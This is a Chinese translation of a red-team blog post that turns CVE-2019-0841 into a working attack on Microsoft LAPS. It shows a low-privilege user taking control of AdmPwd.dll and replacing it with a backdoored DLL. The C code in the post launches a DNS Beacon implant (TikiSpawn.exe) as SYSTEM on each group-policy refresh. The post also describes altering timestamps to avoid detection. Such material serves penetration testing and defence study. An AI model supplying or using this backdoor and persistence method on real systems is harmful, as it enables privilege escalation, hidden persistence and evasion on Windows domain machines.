4月9日,Nabeel Ahmed公布了CVE-2019-0841漏洞的细节。它可让低权限用户完全控制NT AUTHORITY\SYSTEM所属的文件,易引发权限提升攻击。Nabeel发布了一篇博客文章,详细描述了漏洞,并且还带有PoC代码和演示视频。
从视频中我们可以看到,一个低权限用户完全控制了psmachine.dll,然后利用谷歌Chrome的更新服务获得了一个SYSTEM权限的shell。但是,视频中的一系列操作在实际渗透操作中显然是很困难的,所以我和RythmStick一起尝试把这个权限提升方法模拟应用在实际渗透过程中。
不同于视频中利用Chrome浏览器作为攻击中介,RythmStick这次找到了LAPS作为我们的利用目标。
LAPS(Local Administrator Password Solution),本地管理员密码管理方案,用来集中管理域内主机本地管理员的口令,微软2015年发布。
我们已经知道了一些滥用LAPS的方法,而这次我们想利用一个DLL文件来创造一个system权限的shell。
本地计算机通过`AdmPwd.dll`执行所有LAPS功能,而且此DLL没有完整性检查,可以被修改替换。
开端
在我们的演示中,有一个HTTP Beacon,可看作一个低权限用户。该用户肯定不是本地管理员。
首先,让我们看看AdmPwd.dll的相关权限,以证明我们目前无法控制它。
CVE-2019-0841
Nabeel的PoC是用C语言编写的,所以我们必须将它上传到目标机器上运行。
再次检查文件的权限,现在,我们已完全控制了该文件。
AdmPwd.dll
此时,你可以将后门放置在你喜欢的任何位置,具体取决于你希望的后门触发条件。我们选择利用DllMain,以便在每个gpupdate(组策略刷新)时触发,但我认为将其在密码重置时触发是一个更有趣的权限维持方法。
因为我C语言能力很糟糕,所以只编写了一个非常简单的操作CreateProcess,它会以system权限运行一个恶意软件TikiSpawn.exe,里面包含了DNS Beacon的payload。
void Backdoor()
{
STARTUPINFO sInfo;
PROCESS_INFORMATION pInfo;
RtlSecureZeroMemory(&sInfo, sizeof(sInfo));
RtlSecureZeroMemory(&pInfo, sizeof(pInfo));
sInfo.cb = sizeof(sInfo);
GetStartupInfoW(&sInfo);
CreateProcess(L"C:\\Windows\\System32\\Tasks\\TikiSpawn.exe", NULL, NULL, NULL, FALSE, NULL, NULL, L"C:\\Windows\\System32",
&sInfo, &pInfo);
CloseHandle(pInfo.hProcess);
CloseHandle(pInfo.hThread);
return;
}
//DllMain, Installation, Uninstallation
BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason, LPVOID lpReserved) {
if(ul_reason==DLL_PROCESS_ATTACH) {
Backdoor();
hDll=(HINSTANCE)hModule;
}
return TRUE;
}
覆盖DLL文件是非常简单的,直接进入文件夹C:\Program Files\LAPS\CSE,上传即可。
时间戳
这时,你还可以修改其时间戳,让它看起来更合理。如果机器已安装了LAPS的UI,那么可以把时间戳修改的和AdmPwd.Utils.dll一样。
请注意,上图中CSE目录的04/13/2019是LAPS的安装日期。
GPUpdate
在组策略刷新之后,我们获得了DNS Beacon。
以下就是Beacon在Process Explorer中的表现。看起来和系统自启动的正常程序很相似,虽然也有一些其他的问题(我也许会另写一篇文章来说明)。
在几个小时后,我们得到了一堆Beacon。
感谢你的阅读!
本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场:https://nosec.org/home/detail/2534.html
来源:https://rastamouse.me/2019/04/weaponizing-cve-2019-0841-with-laps/
